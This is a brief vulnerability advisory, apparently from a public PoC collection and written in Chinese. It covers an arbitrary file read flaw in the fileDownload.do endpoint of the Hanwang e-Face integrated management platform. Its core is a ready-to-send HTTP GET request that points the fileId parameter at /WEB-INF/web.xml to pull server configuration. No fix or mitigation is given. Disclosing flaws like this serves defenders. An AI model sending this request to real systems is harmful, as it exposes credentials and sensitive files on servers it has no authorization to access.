汉王e脸通综合管理平台 fileDownload.do 任意文件读取漏洞

2025-06-16 汉王e脸通综合管理平台 PoC Public

Description

汉王e脸通综合管理平台 fileDownload.do 存在任意文件读取漏洞,攻击者可以根据该漏洞获取大量敏感信息。

PoC

GET /manage/personnel/fileDownload.do?fileId=/WEB-INF/web.xml&recoToken=ZuZBOrvLG8M HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities